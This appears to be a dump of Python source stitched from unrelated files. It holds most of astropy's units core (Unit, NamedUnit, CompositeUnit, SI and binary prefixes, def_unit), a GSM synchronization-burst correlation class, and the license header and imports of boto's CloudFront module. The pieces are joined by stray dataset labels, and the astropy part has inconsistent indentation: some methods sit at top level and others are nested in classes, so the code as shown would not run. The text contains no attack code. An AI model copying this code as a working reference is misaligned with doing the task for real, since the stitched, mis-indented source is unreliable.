def to_system(self, system):
"""
Converts this unit into ones belonging to the given system.
Since more than one result may be possible, a list is always
returned.
Parameters
----------
system : module
The module that defines the unit system. Commonly used
ones include `astropy.units.si` and `astropy.units.cgs`.
To use your own module it must contain unit objects and a
sequence member named ``bases`` containing the base units of
the system.
Returns
-------
units : list of `CompositeUnit`
The list is ranked so that units containing only the base
units of that system will appear first.
"""
bases = set(system.bases)
def score(compose):
# In case that compose._bases has no elements we return
# 'np.inf' as 'score value'. It does not really matter which
# number we would return. This case occurs for instance for
# dimensionless quantities:
compose_bases = compose.bases
if len(compose_bases) == 0:
return np.inf
else:
sum = 0
for base in compose_bases:
if base in bases:
sum += 1
return sum / float(len(compose_bases))
x = self.decompose(bases=bases)
composed = x.compose(units=system)
composed = sorted(composed, key=score, reverse=True)
return composed
@lazyproperty
def si(self):
"""
Returns a copy of the current `Unit` instance in SI units.
"""
from . import si
return self.to_system(si)[0]
@lazyproperty
def cgs(self):
"""
Returns a copy of the current `Unit` instance with CGS units.
"""
from . import cgs
return self.to_system(cgs)[0]
    @property
    def physical_type(self):
        """
        Return the physical type on the unit.

        Examples
        --------
        >>> from astropy import units as u
        >>> print(u.m.physical_type)
        length
        """
        # Local import -- presumably to avoid a circular dependency at
        # module load time; confirm before moving to the top of the file.
        from . import physical
        return physical.get_physical_type(self)
    def _get_units_with_same_physical_type(self, equivalencies=[]):
        """
        Return a list of registered units with the same physical type
        as this unit.

        This function is used by Quantity to add its built-in
        conversions to equivalent units.

        This is a private method, since end users should be encouraged
        to use the more powerful `compose` and `find_equivalent_units`
        methods (which use this under the hood).

        Parameters
        ----------
        equivalencies : list of equivalence pairs, optional
            A list of equivalence pairs to also pull options from.
            See :ref:`unit_equivalencies`.  It must already be
            normalized using `_normalize_equivalencies`.
        """
        unit_registry = get_current_unit_registry()
        units = set(unit_registry.get_units_with_physical_type(self))
        for funit, tunit, a, b in equivalencies:
            if tunit is not None:
                # NOTE(review): the first branch uses the public
                # is_equivalent while the second uses _is_equivalent --
                # presumably interchangeable here since the pairs were
                # already normalized; confirm before unifying.
                if self.is_equivalent(funit) and tunit not in units:
                    units.update(
                        unit_registry.get_units_with_physical_type(tunit))
                if self._is_equivalent(tunit) and funit not in units:
                    units.update(
                        unit_registry.get_units_with_physical_type(funit))
            else:
                if self.is_equivalent(funit):
                    units.add(dimensionless_unscaled)
        return units
    class EquivalentUnitsList(list):
        """
        A class to handle pretty-printing the result of
        `find_equivalent_units`.
        """

        def __repr__(self):
            if len(self) == 0:
                return "[]"
            else:
                # Build (name, definition, aliases) rows for each unit.
                lines = []
                for u in self:
                    irred = u.decompose().to_string()
                    if irred == u.name:
                        # The unit decomposes to itself, i.e. it is
                        # irreducible.
                        irred = "irreducible"
                    lines.append((u.name, irred, ', '.join(u.aliases)))

                lines.sort()
                lines.insert(0, ('Primary name', 'Unit definition', 'Aliases'))
                # Compute one column width per field so the table aligns.
                widths = [0, 0, 0]
                for line in lines:
                    for i, col in enumerate(line):
                        widths[i] = max(widths[i], len(col))

                f = " {{0:<{0}s}} | {{1:<{1}s}} | {{2:<{2}s}}".format(*widths)
                lines = [f.format(*line) for line in lines]
                # Header row, then the body wrapped in brackets.
                lines = (lines[0:1] +
                         ['['] +
                         ['{0} ,'.format(x) for x in lines[1:]] +
                         [']'])
                return '\n'.join(lines)
def find_equivalent_units(self, equivalencies=[], units=None,
include_prefix_units=False):
"""
Return a list of all the units that are the same type as ``self``.
Parameters
----------
equivalencies : list of equivalence pairs, optional
A list of equivalence pairs to also list. See
:ref:`unit_equivalencies`.
Any list given, including an empty one, supercedes global defaults
that may be in effect (as set by `set_enabled_equivalencies`)
units : set of units to search in, optional
If not provided, all defined units will be searched for
equivalencies. Otherwise, may be a dict, module or
sequence containing the units to search for equivalencies.
include_prefix_units : bool, optional
When `True`, include prefixed units in the result.
Default is `False`.
Returns
-------
units : list of `UnitBase`
A list of unit objects that match ``u``. A subclass of
`list` (``EquivalentUnitsList``) is returned that
pretty-prints the list of units when output.
"""
results = self.compose(
equivalencies=equivalencies, units=units, max_depth=1,
include_prefix_units=include_prefix_units)
results = set(
x.bases[0] for x in results if len(x.bases) == 1)
return self.EquivalentUnitsList(results)
def is_unity(self):
"""
Returns `True` if the unit is unscaled and dimensionless.
"""
return False
    class NamedUnit(UnitBase):
        """
        The base class of units that have a name.

        Parameters
        ----------
        st : str, list of str, 2-tuple
            The name of the unit.  If a list of strings, the first element
            is the canonical (short) name, and the rest of the elements
            are aliases.  If a tuple of lists, the first element is a list
            of short names, and the second element is a list of long
            names; all but the first short name are considered "aliases".
            Each name *should* be a valid Python identifier to make it
            easy to access, but this is not required.

        namespace : dict, optional
            When provided, inject the unit, and all of its aliases, in the
            given namespace dictionary.  If a unit by the same name is
            already in the namespace, a ValueError is raised.

        doc : str, optional
            A docstring describing the unit.

        format : dict, optional
            A mapping to format-specific representations of this unit.
            For example, for the ``Ohm`` unit, it might be nice to have it
            displayed as ``\\Omega`` by the ``latex`` formatter.  In that
            case, `format` argument should be set to::

                {'latex': r'\\Omega'}

        Raises
        ------
        ValueError
            If any of the given unit names are already in the registry.

        ValueError
            If any of the given unit names are not valid Python tokens.
        """

        def __init__(self, st, doc=None, format=None, namespace=None):
            UnitBase.__init__(self)

            if isinstance(st, (bytes, six.text_type)):
                # A single string is both the canonical name and the only
                # short name.
                self._names = [st]
                self._short_names = [st]
                self._long_names = []
            elif isinstance(st, tuple):
                # A 2-tuple of (short names, long names).
                if not len(st) == 2:
                    raise ValueError("st must be string, list or 2-tuple")
                self._names = st[0] + [n for n in st[1] if n not in st[0]]
                if not len(self._names):
                    raise ValueError("must provide at least one name")
                self._short_names = st[0][:]
                self._long_names = st[1][:]
            else:
                # A list: first entry is the short name, the rest are
                # long-name aliases.
                if len(st) == 0:
                    raise ValueError(
                        "st list must have at least one entry")
                self._names = st[:]
                self._short_names = [st[0]]
                self._long_names = st[1:]

            if format is None:
                format = {}
            self._format = format

            if doc is None:
                doc = self._generate_doc()
            else:
                doc = textwrap.dedent(doc)
                doc = textwrap.fill(doc)

            self.__doc__ = doc

            self._inject(namespace)

        def _generate_doc(self):
            """
            Generate a docstring for the unit if the user didn't supply
            one.  This is only used from the constructor and may be
            overridden in subclasses.
            """
            names = self.names
            if len(self.names) > 1:
                # "long name (short name)"
                return "{1} ({0})".format(*names[:2])
            else:
                return names[0]

        def get_format_name(self, format):
            """
            Get a name for this unit that is specific to a particular
            format.

            Uses the dictionary passed into the `format` kwarg in the
            constructor.

            Parameters
            ----------
            format : str
                The name of the format

            Returns
            -------
            name : str
                The name of the unit for the given format.
            """
            return self._format.get(format, self.name)

        @property
        def names(self):
            """
            Returns all of the names associated with this unit.
            """
            return self._names

        @property
        def name(self):
            """
            Returns the canonical (short) name associated with this unit.
            """
            return self._names[0]

        @property
        def aliases(self):
            """
            Returns the alias (long) names for this unit.
            """
            return self._names[1:]

        @property
        def short_names(self):
            """
            Returns all of the short names associated with this unit.
            """
            return self._short_names

        @property
        def long_names(self):
            """
            Returns all of the long names associated with this unit.
            """
            return self._long_names

        def _inject(self, namespace=None):
            """
            Injects the unit, and all of its aliases, in the given
            namespace dictionary.
            """
            if namespace is None:
                return

            # Loop through all of the names first, to ensure all of them
            # are new, then add them all as a single "transaction" below.
            for name in self._names:
                if name in namespace and self != namespace[name]:
                    raise ValueError(
                        "Object with name {0!r} already exists in "
                        "given namespace ({1!r}).".format(
                            name, namespace[name]))

            for name in self._names:
                namespace[name] = self
def _recreate_irreducible_unit(cls, names, registered):
"""
This is used to reconstruct units when passed around by
multiprocessing.
"""
registry = get_current_unit_registry().registry
if names[0] in registry:
# If in local registry return that object.
return registry[names[0]]
else:
# otherwise, recreate the unit.
unit = cls(names)
if registered:
# If not in local registry but registered in origin registry,
# enable unit in local registry.
get_current_unit_registry().add_enabled_units([unit])
return unit
    class IrreducibleUnit(NamedUnit):
        """
        Irreducible units are the units that all other units are defined
        in terms of.

        Examples are meters, seconds, kilograms, amperes, etc.  There is
        only once instance of such a unit per type.
        """

        def __reduce__(self):
            # When IrreducibleUnit objects are passed to other processes
            # over multiprocessing, they need to be recreated to be the
            # ones already in the subprocesses' namespace, not new
            # objects, or they will be considered "unconvertible".
            # Therefore, we have a custom pickler/unpickler that
            # understands how to recreate the Unit on the other side.
            registry = get_current_unit_registry().registry
            return (_recreate_irreducible_unit,
                    (self.__class__, list(self.names), self.name in registry),
                    self.__dict__)

        @property
        def represents(self):
            """The unit that this named unit represents.

            For an irreducible unit, that is always itself.
            """
            return self

        def decompose(self, bases=set()):
            # An irreducible unit decomposes to itself, unless a set of
            # target bases is given -- then express it in terms of the
            # first convertible base.
            if len(bases) and self not in bases:
                for base in bases:
                    try:
                        scale = self._to(base)
                    except UnitsError:
                        pass
                    else:
                        if is_effectively_unity(scale):
                            return base
                        else:
                            # Wrap in a CompositeUnit to carry the scale.
                            return CompositeUnit(scale, [base], [1],
                                                 _error_check=False)

                raise UnitConversionError(
                    "Unit {0} can not be decomposed into the requested "
                    "bases".format(self))

            return self
    class UnrecognizedUnit(IrreducibleUnit):
        """
        A unit that did not parse correctly.  This allows for
        roundtripping it as a string, but no unit operations actually work
        on it.

        Parameters
        ----------
        st : str
            The name of the unit.
        """
        # For UnrecognizedUnits, we want to use "standard" Python
        # pickling, not the special case that is used for
        # IrreducibleUnits.
        __reduce__ = object.__reduce__

        def __repr__(self):
            return "UnrecognizedUnit({0})".format(str(self))

        def __bytes__(self):
            return self.name.encode('ascii', 'replace')
        # On Python 2, str() must return bytes ...
        if six.PY2:
            __str__ = __bytes__

        def __unicode__(self):
            return self.name
        # ... on Python 3, str() returns text.
        if not six.PY2:
            __str__ = __unicode__

        def to_string(self, format=None):
            return self.name

        def _unrecognized_operator(self, *args, **kwargs):
            # Shared implementation for every arithmetic/comparison
            # operator below: always an error.
            raise ValueError(
                "The unit {0!r} is unrecognized, so all arithmetic operations "
                "with it are invalid.".format(self.name))

        __pow__ = __div__ = __rdiv__ = __truediv__ = __rtruediv__ = __mul__ = \
            __rmul__ = __lt__ = __gt__ = __le__ = __ge__ = __neg__ = \
            _unrecognized_operator

        def __eq__(self, other):
            # Two unrecognized units are equal only if their names match.
            other = Unit(other, parse_strict='silent')
            return isinstance(other, UnrecognizedUnit) and self.name == other.name

        def __ne__(self, other):
            return not (self == other)

        def is_equivalent(self, other, equivalencies=None):
            # Normalize purely for argument validation; equivalencies
            # cannot help an unrecognized unit.
            self._normalize_equivalencies(equivalencies)
            return self == other

        def _get_converter(self, other, equivalencies=None):
            self._normalize_equivalencies(equivalencies)
            raise ValueError(
                "The unit {0!r} is unrecognized. It can not be converted "
                "to other units.".format(self.name))

        def get_format_name(self, format):
            return self.name

        def is_unity(self):
            return False
    class _UnitMetaClass(InheritDocstrings):
        """
        This metaclass exists because the Unit constructor should
        sometimes return instances that already exist.  This "overrides"
        the constructor before the new instance is actually created, so we
        can return an existing one.
        """

        def __call__(self, s, represents=None, format=None, namespace=None,
                     doc=None, parse_strict='raise'):
            # Short-circuit if we're already a unit
            # (duck-typed via the _get_physical_type_id attribute).
            if hasattr(s, '_get_physical_type_id'):
                return s

            # turn possible Quantity input for s or represents into a Unit
            from .quantity import Quantity

            if isinstance(represents, Quantity):
                if is_effectively_unity(represents.value):
                    represents = represents.unit
                else:
                    # cannot use _error_check=False: scale may be effectively unity
                    represents = CompositeUnit(represents.value *
                                               represents.unit.scale,
                                               bases=represents.unit.bases,
                                               powers=represents.unit.powers)

            if isinstance(s, Quantity):
                if is_effectively_unity(s.value):
                    s = s.unit
                else:
                    s = CompositeUnit(s.value * s.unit.scale,
                                      bases=s.unit.bases,
                                      powers=s.unit.powers)

            # now decide what we really need to do; define derived Unit?
            if isinstance(represents, UnitBase):
                # This has the effect of calling the real __new__ and
                # __init__ on the Unit class.
                return super(_UnitMetaClass, self).__call__(
                    s, represents, format=format, namespace=namespace, doc=doc)

            # or interpret a Quantity (now became unit), string or number?
            if isinstance(s, UnitBase):
                return s

            elif isinstance(s, (bytes, six.text_type)):
                if len(s.strip()) == 0:
                    # Return the NULL unit
                    return dimensionless_unscaled

                if format is None:
                    format = unit_format.Generic

                f = unit_format.get_format(format)
                if not six.PY2 and isinstance(s, bytes):
                    s = s.decode('ascii')

                try:
                    return f.parse(s)
                except Exception as e:
                    if parse_strict == 'silent':
                        pass
                    else:
                        # Deliberately not issubclass here.  Subclasses
                        # should use their name.
                        if f is not unit_format.Generic:
                            format_clause = f.name + ' '
                        else:
                            format_clause = ''
                        msg = ("'{0}' did not parse as {1}unit: {2}"
                               .format(s, format_clause, six.text_type(e)))
                        if parse_strict == 'raise':
                            raise ValueError(msg)
                        elif parse_strict == 'warn':
                            warnings.warn(msg, UnitsWarning)
                        else:
                            raise ValueError("'parse_strict' must be 'warn', "
                                             "'raise' or 'silent'")
                    # Fall through: unparseable string becomes an
                    # UnrecognizedUnit that still round-trips as a string.
                    return UnrecognizedUnit(s)

            elif isinstance(s, (int, float, np.floating, np.integer)):
                # A bare number becomes a dimensionless scaled unit.
                return CompositeUnit(s, [], [])

            elif s is None:
                raise TypeError("None is not a valid Unit")

            else:
                raise TypeError("{0} can not be converted to a Unit".format(s))
    @six.add_metaclass(_UnitMetaClass)
    class Unit(NamedUnit):
        """
        The main unit class.

        There are a number of different ways to construct a Unit, but
        always returns a `UnitBase` instance.  If the arguments refer to
        an already-existing unit, that existing unit instance is returned,
        rather than a new one.

        - From a string::

            Unit(s, format=None, parse_strict='silent')

          Construct from a string representing a (possibly compound) unit.

          The optional `format` keyword argument specifies the format the
          string is in, by default ``"generic"``.  For a description of
          the available formats, see `astropy.units.format`.

          The optional ``parse_strict`` keyword controls what happens when an
          unrecognized unit string is passed in.  It may be one of the following:

            - ``'raise'``: (default) raise a ValueError exception.

            - ``'warn'``: emit a Warning, and return an
              `UnrecognizedUnit` instance.

            - ``'silent'``: return an `UnrecognizedUnit` instance.

        - From a number::

            Unit(number)

          Creates a dimensionless unit.

        - From a `UnitBase` instance::

            Unit(unit)

          Returns the given unit unchanged.

        - From `None`::

            Unit()

          Returns the null unit.

        - The last form, which creates a new `Unit` is described in detail
          below.

        Parameters
        ----------
        st : str or list of str
            The name of the unit.  If a list, the first element is the
            canonical (short) name, and the rest of the elements are
            aliases.

        represents : UnitBase instance
            The unit that this named unit represents.

        doc : str, optional
            A docstring describing the unit.

        format : dict, optional
            A mapping to format-specific representations of this unit.
            For example, for the ``Ohm`` unit, it might be nice to have it
            displayed as ``\\Omega`` by the ``latex`` formatter.  In that
            case, `format` argument should be set to::

                {'latex': r'\\Omega'}

        namespace : dictionary, optional
            When provided, inject the unit (and all of its aliases) into
            the given namespace.

        Raises
        ------
        ValueError
            If any of the given unit names are already in the registry.

        ValueError
            If any of the given unit names are not valid Python tokens.
        """

        def __init__(self, st, represents=None, doc=None,
                     format=None, namespace=None):
            # Normalize `represents` through the Unit factory first, so
            # strings/numbers become proper UnitBase instances.
            represents = Unit(represents)
            self._represents = represents

            NamedUnit.__init__(self, st, namespace=namespace, doc=doc,
                               format=format)

        @property
        def represents(self):
            """The unit that this named unit represents."""
            return self._represents

        def decompose(self, bases=set()):
            # Delegate decomposition to the underlying unit.
            return self._represents.decompose(bases=bases)

        def is_unity(self):
            return self._represents.is_unity()

        def __hash__(self):
            # Combine the name with the represented unit's hash.
            return hash(self.name) + hash(self._represents)

        @classmethod
        def _from_physical_type_id(cls, physical_type_id):
            # get string bases and powers from the ID tuple
            bases = [cls(base) for base, _ in physical_type_id]
            powers = [power for _, power in physical_type_id]

            if len(physical_type_id) == 1 and powers[0] == 1:
                unit = bases[0]
            else:
                unit = CompositeUnit(1, bases, powers)

            return unit
class PrefixUnit(Unit):
"""
A unit that is simply a SI-prefixed version of another unit.
For example, ``mm`` is a `PrefixUnit` of ``.001 * m``.
The constructor is the same as for `Unit`.
"""
class CompositeUnit(UnitBase):
"""
Create a composite unit using expressions of previously defined
units.
Direct use of this class is not recommended. Instead use the
factory function `Unit` and arithmetic operators to compose
units.
Parameters
----------
scale : number
A scaling factor for the unit.
bases : sequence of `UnitBase`
A sequence of units this unit is composed of.
powers : sequence of numbers
A sequence of powers (in parallel with ``bases``) for each
of the base units.
"""
def __init__(self, scale, bases, powers, decompose=False,
decompose_bases=set(), _error_check=True):
# There are many cases internal to astropy.units where we
# already know that all the bases are Unit objects, and the
# powers have been validated. In those cases, we can skip the
# error checking for performance reasons. When the private
# kwarg `_error_check` is False, the error checking is turned
# off.
if _error_check:
scale = sanitize_scale(scale)
for base in bases:
if not isinstance(base, UnitBase):
raise TypeError(
"bases must be sequence of UnitBase instances")
powers = [validate_power(p) for p in powers]
self._scale = scale
self._bases = bases
self._powers = powers
self._decomposed_cache = None
self._expand_and_gather(decompose=decompose, bases=decompose_bases)
self._hash = None
def __repr__(self):
if len(self._bases):
return super(CompositeUnit, self).__repr__()
else:
if self._scale != 1.0:
return 'Unit(dimensionless with a scale of {0})'.format(
self._scale)
else:
return 'Unit(dimensionless)'
def __hash__(self):
if self._hash is None:
parts = ([str(self._scale)] +
[x.name for x in self._bases] +
[str(x) for x in self._powers])
self._hash = hash(tuple(parts))
return self._hash
@property
def scale(self):
"""
Return the scale of the composite unit.
"""
return self._scale
@property
def bases(self):
"""
Return the bases of the composite unit.
"""
return self._bases
@property
def powers(self):
"""
Return the powers of the composite unit.
"""
return self._powers
    def _expand_and_gather(self, decompose=False, bases=set()):
        # Normalize this unit in place: optionally decompose each base,
        # merge repeated bases by summing powers, drop zero powers, and
        # fold all numeric prefactors into a single scale.
        def add_unit(unit, power, scale):
            # Accumulate unit**power into `new_parts`, first converting
            # `unit` to one of the requested `bases` when a conversion
            # exists (the conversion factor is folded into `scale`).
            if unit not in bases:
                for base in bases:
                    try:
                        scale *= unit._to(base) ** power
                    except UnitsError:
                        pass
                    except ValueError:
                        # on python2, sqrt(negative number) does not
                        # automatically lead to a complex number, but this is
                        # needed for the corner case of mag=-0.4*dex
                        scale *= cmath.exp(power * cmath.log(unit._to(base)))
                        unit = base
                        break
                    else:
                        unit = base
                        break
            if unit in new_parts:
                # Combine powers of an already-seen base, keeping exact
                # fractions where possible.
                a, b = resolve_fractions(new_parts[unit], power)
                new_parts[unit] = a + b
            else:
                new_parts[unit] = power
            return scale
        new_parts = {}
        scale = self.scale
        for b, p in zip(self.bases, self.powers):
            if decompose and b not in bases:
                b = b.decompose(bases=bases)
            if isinstance(b, CompositeUnit):
                # Fold the sub-unit's own scale (raised to p) into ours.
                try:
                    scale *= b._scale ** p
                except ValueError:
                    # on python2, sqrt(negative number) does not
                    # automatically lead to a complex number, but this is
                    # needed for the corner case of mag=-0.4*dex
                    scale *= cmath.exp(p * cmath.log(b._scale))
                for b_sub, p_sub in zip(b._bases, b._powers):
                    # NOTE(review): the next line rebinds `b`, shadowing the
                    # outer loop variable; this is safe only because the zip
                    # above already captured b._bases/b._powers, but it is
                    # fragile — worth a rename upstream.
                    a, b = resolve_fractions(p_sub, p)
                    scale = add_unit(b_sub, a * b, scale)
            else:
                scale = add_unit(b, p, scale)
        # Drop zero powers, then sort by descending power and name for a
        # canonical ordering.
        new_parts = [x for x in six.iteritems(new_parts) if x[1] != 0]
        new_parts.sort(key=lambda x: (-x[1], getattr(x[0], 'name', '')))
        self._bases = [x[0] for x in new_parts]
        self._powers = [validate_power(x[1]) for x in new_parts]
        self._scale = sanitize_scale(scale)
def __copy__(self):
"""
For compatibility with python copy module.
"""
return CompositeUnit(self._scale, self._bases[:], self._powers[:])
    def decompose(self, bases=set()):
        # Return this unit expressed in irreducible (or the given) bases.
        # The no-argument result is cached on the instance.
        if len(bases) == 0 and self._decomposed_cache is not None:
            return self._decomposed_cache
        # Short-circuit: if every base is already irreducible (and, when a
        # base set was given, already within it), we are our own
        # decomposition.  The for/else runs only when no `break` fires.
        for base in self.bases:
            if (not isinstance(base, IrreducibleUnit) or
                    (len(bases) and base not in bases)):
                break
        else:
            if len(bases) == 0:
                self._decomposed_cache = self
            return self
        # Build a fresh CompositeUnit with decomposition enabled; the real
        # work happens in _expand_and_gather during construction.
        x = CompositeUnit(self.scale, self.bases, self.powers, decompose=True,
                          decompose_bases=bases)
        if len(bases) == 0:
            self._decomposed_cache = x
        return x
def is_unity(self):
unit = self.decompose()
return len(unit.bases) == 0 and unit.scale == 1.0
# (short symbols, long names, multiplicative factor) triples covering the
# full range of SI prefixes from yotta (1e24) down to yocto (1e-24).
# Consumed by _add_prefixes when `prefixes=True` is passed to def_unit.
si_prefixes = [
    (['Y'], ['yotta'], 1e24),
    (['Z'], ['zetta'], 1e21),
    (['E'], ['exa'], 1e18),
    (['P'], ['peta'], 1e15),
    (['T'], ['tera'], 1e12),
    (['G'], ['giga'], 1e9),
    (['M'], ['mega'], 1e6),
    (['k'], ['kilo'], 1e3),
    (['h'], ['hecto'], 1e2),
    (['da'], ['deka', 'deca'], 1e1),
    (['d'], ['deci'], 1e-1),
    (['c'], ['centi'], 1e-2),
    (['m'], ['milli'], 1e-3),
    (['u'], ['micro'], 1e-6),
    (['n'], ['nano'], 1e-9),
    (['p'], ['pico'], 1e-12),
    (['f'], ['femto'], 1e-15),
    (['a'], ['atto'], 1e-18),
    (['z'], ['zepto'], 1e-21),
    (['y'], ['yocto'], 1e-24)
]
# IEC binary prefixes (powers of 2), same triple layout as si_prefixes.
binary_prefixes = [
    (['Ki'], ['kibi'], 2. ** 10),
    (['Mi'], ['mebi'], 2. ** 20),
    (['Gi'], ['gibi'], 2. ** 30),
    (['Ti'], ['tebi'], 2. ** 40),
    (['Pi'], ['pebi'], 2. ** 50),
    (['Ei'], ['exbi'], 2. ** 60)
]
def _add_prefixes(u, excludes=(), namespace=None, prefixes=False):
    """
    Set up all of the standard metric prefixes for a unit. This
    function should not be used directly, but instead use the
    `prefixes` kwarg on `def_unit`.

    Parameters
    ----------
    u : `UnitBase`
        The unit to generate prefixed versions of.
    excludes : sequence of str, optional
        Any prefixes to exclude from creation to avoid namespace
        collisions.  (Immutable tuple default instead of a shared
        mutable ``[]``; the value is only read.)
    namespace : dict, optional
        When provided, inject the unit (and all of its aliases) into
        the given namespace dictionary.
    prefixes : bool or list, optional
        When `True`, use the standard SI prefixes.  When a list, it is
        a list of prefix definitions of the form:
            (short_names, long_tables, factor)
    """
    if prefixes is True:
        prefixes = si_prefixes
    elif prefixes is False:
        prefixes = []
    for short, full, factor in prefixes:
        names = []
        # Maps formatter name -> prefixed representation.  Named `fmt`
        # rather than `format` to avoid shadowing the builtin.
        fmt = {}
        for prefix in short:
            if prefix in excludes:
                continue
            for alias in u.short_names:
                names.append(prefix + alias)
            # This is a hack to use Greek mu as a prefix
            # for some formatters.
            if prefix == 'u':
                fmt['latex'] = r'\mu ' + u.get_format_name('latex')
                fmt['unicode'] = 'μ' + u.get_format_name('unicode')
            for key, val in six.iteritems(u._format):
                fmt.setdefault(key, prefix + val)
        for prefix in full:
            if prefix in excludes:
                continue
            for alias in u.long_names:
                names.append(prefix + alias)
        if len(names):
            # Registering the PrefixUnit in the namespace is the side
            # effect we want; the instance itself is not kept here.
            PrefixUnit(names, CompositeUnit(factor, [u], [1],
                                            _error_check=False),
                       namespace=namespace, format=fmt)
def def_unit(s, represents=None, doc=None, format=None, prefixes=False,
             exclude_prefixes=(), namespace=None):
    """
    Factory function for defining new units.

    Parameters
    ----------
    s : str or list of str
        The name of the unit. If a list, the first element is the
        canonical (short) name, and the rest of the elements are
        aliases.
    represents : UnitBase instance, optional
        The unit that this named unit represents. If not provided,
        a new `IrreducibleUnit` is created.
    doc : str, optional
        A docstring describing the unit.
    format : dict, optional
        A mapping to format-specific representations of this unit.
        For example, for the ``Ohm`` unit, it might be nice to
        have it displayed as ``\\Omega`` by the ``latex``
        formatter. In that case, `format` argument should be set
        to::

            {'latex': r'\\Omega'}

    prefixes : bool or list, optional
        When `True`, generate all of the SI prefixed versions of the
        unit as well. For example, for a given unit ``m``, will
        generate ``mm``, ``cm``, ``km``, etc. When a list, it is a list of
        prefix definitions of the form:

            (short_names, long_tables, factor)

        Default is `False`. This function always returns the base
        unit object, even if multiple scaled versions of the unit were
        created.
    exclude_prefixes : sequence of str, optional
        If any of the SI prefixes need to be excluded, they may be
        listed here. For example, ``Pa`` can be interpreted either as
        "petaannum" or "Pascal". Therefore, when defining the
        prefixes for ``a``, ``exclude_prefixes`` should be set to
        ``["P"]``.  (Immutable tuple default instead of a shared
        mutable ``[]``; the value is only read.)
    namespace : dict, optional
        When provided, inject the unit (and all of its aliases and
        prefixes), into the given namespace dictionary.

    Returns
    -------
    unit : `UnitBase` object
        The newly-defined unit, or a matching unit that was already
        defined.
    """
    # A unit with a `represents` target is a named alias for an existing
    # unit expression; otherwise a brand-new irreducible unit is created.
    if represents is not None:
        result = Unit(s, represents, namespace=namespace, doc=doc,
                      format=format)
    else:
        result = IrreducibleUnit(
            s, namespace=namespace, doc=doc, format=format)
    if prefixes:
        _add_prefixes(result, excludes=exclude_prefixes, namespace=namespace,
                      prefixes=prefixes)
    return result
def _condition_arg(value):
    """
    Validate that *value* is acceptable for conversion purposes.

    Numeric scalars pass through unchanged; anything else is coerced to
    a numpy array, which must end up with a numeric dtype.

    Parameters
    ----------
    value : int or float value, or sequence of such values

    Returns
    -------
    Scalar value or numpy array

    Raises
    ------
    ValueError
        If value is not convertible to an int, float, or complex
        scalar or array.
    """
    if isinstance(value, (float, complex) + tuple(six.integer_types)):
        return value
    if isinstance(value, np.ndarray) and value.dtype.kind in 'ifc':
        return value
    converted = np.array(value)
    if converted.dtype.kind not in 'ifc':
        raise ValueError("Value not scalar compatible or convertible to "
                         "an int, float, or complex array")
    return converted
# The canonical dimensionless unit: no bases and a scale of exactly 1.
dimensionless_unscaled = CompositeUnit(1, [], [], _error_check=False)
# Abbreviation of the above, see #1980
one = dimensionless_unscaled
# Maintain error in old location for backward compatibility
# TODO: Is this still needed? Should there be a deprecation warning?
unit_format.fits.UnitScaleError = UnitScaleError
|
unknown
|
codeparrot/codeparrot-clean
| ||
from Burst import Burst
import numpy as np
class SB(Burst):
    """GSM Synchronization Burst (SB).

    Holds the 64-entry extended training (sync) sequence of the burst and
    provides FFT-based correlation against it for burst detection.
    """
    def __init__(self):
        # The 64 sync bits of the SB training sequence, one value per bit.
        self.syncbits = [
            0x01, 0x00, 0x01, 0x01, 0x01, 0x00, 0x00, 0x01,
            0x00, 0x01, 0x01, 0x00, 0x00, 0x00, 0x01, 0x00,
            0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00,
            0x00, 0x00, 0x00, 0x00, 0x01, 0x01, 0x01, 0x01,
            0x00, 0x00, 0x01, 0x00, 0x01, 0x01, 0x00, 0x01,
            0x00, 0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x01,
            0x00, 0x01, 0x01, 0x01, 0x00, 0x01, 0x01, 0x00,
            0x00, 0x00, 0x00, 0x01, 0x01, 0x00, 0x01, 0x01 ]
        # A second 64-bit pattern kept alongside the sync bits.
        # NOTE(review): `bits` is not used anywhere in this class — presumably
        # consumed by the Burst base class or callers; verify before removing.
        self.bits = [
            1,0,1,1,1,0,0,1,
            0,1,1,0,0,0,1,0,
            0,0,0,0,0,1,0,0,
            0,0,0,0,1,1,1,1,
            0,0,1,0,1,1,0,1,
            1,0,1,0,0,1,0,1,
            0,1,1,1,0,1,1,0,
            0,0,0,1,1,0,1,1]
        # Map bits {0,1} -> NRZ symbols {-1,+1}.
        s = np.array(self.syncbits)*2-1
        # Oversample the sync sequence by 4 (each symbol repeated 4 times).
        self.sync = []
        for x in s:
            self.sync += [x,x,x,x]
        # GMSK-modulated version of the sync symbols, used for channel
        # estimation; gmsk_mapper is provided by the Burst base class.
        self.training_seq = self.gmsk_mapper(s,complex(0.,-1.))
    def demodu(self,s):
        # Cross-correlate the differentially-decoded input with the
        # (zero-padded) sync sequence via FFT: ifft(fft(x) * conj(fft(ref))).
        # Note: the parameter `s` is rebound below to the reference signal.
        self.dem = self.diff(s)
        s = np.zeros(len(self.dem),dtype=complex)
        s[:len(self.sync)]=self.sync[:]
        fs = np.fft.fft(s)
        fd = np.fft.fft(self.dem)
        tr = np.abs(np.fft.ifft(fd*np.conj(fs)))
        return tr
    def channelEst( self, frame, osr ):
        # Delegate to the base-class channel estimator with our own
        # training sequence.
        return Burst.channelEst( self, frame, self.training_seq, osr )
|
unknown
|
codeparrot/codeparrot-clean
| ||
# Copyright (c) 2006-2009 Mitch Garnaat http://garnaat.org/
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
import uuid
import base64
import time
from boto.compat import six, json
from boto.cloudfront.identity import OriginAccessIdentity
from boto.cloudfront.object import Object, StreamingObject
from boto.cloudfront.signers import ActiveTrustedSigners, TrustedSigners
from boto.cloudfront.logging import LoggingInfo
